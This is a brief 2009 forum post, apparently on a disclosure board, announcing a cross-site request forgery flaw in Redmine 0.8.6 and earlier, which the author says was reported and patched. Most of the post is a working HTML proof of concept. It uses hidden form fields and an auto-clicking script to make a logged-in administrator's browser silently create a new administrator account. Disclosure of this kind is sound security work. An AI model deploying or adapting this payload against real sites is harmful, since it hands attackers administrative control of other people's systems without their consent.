Where you should disclose your vulnerabilities. Go read
RFPolicy if you want to do responsible disclosure, and go here for when all else fails.
Redmine <= 0.8.6 CSRF
Date: November 16, 2009 01:37PM
Redmine is a flexible project management web application. Written using Ruby on Rails framework, it is cross-platform and cross-database.
Prior to version 0.8.7, it was totally vulnerable to CSRF. I've coded some PoC that creates user with administrative rights. Redmine's SecTeam was informed and in two days they quickly released new version and patch.
Here is the PoC itself
<html>
<body>
<form method=POST action="http://www.site.org/users/new">
<input style="display: none" type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
<input style="display: none" type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
<input style="display: none" type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
<input style="display: none" type="text" value="hacker@hacker.com" size="30" name="user[mail]" id="user_mail"/>
<input style="display: none" type="password" size="25" name="password" id="password" value="hacker" />
<input style="display: none" type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
<input style="display: none" type="checkbox" value="1" name="user[admin]" id="user_admin"/>
<input style="display: none" type="hidden" value="1" name="user[admin]"/>
<input style="display: none" type="submit" value="Create" id="commit" name="commit" />
</form>
<script>document.getElementById("commit").click();</script>
</body>
</html>
---------
http://p0deje.blogspot.com
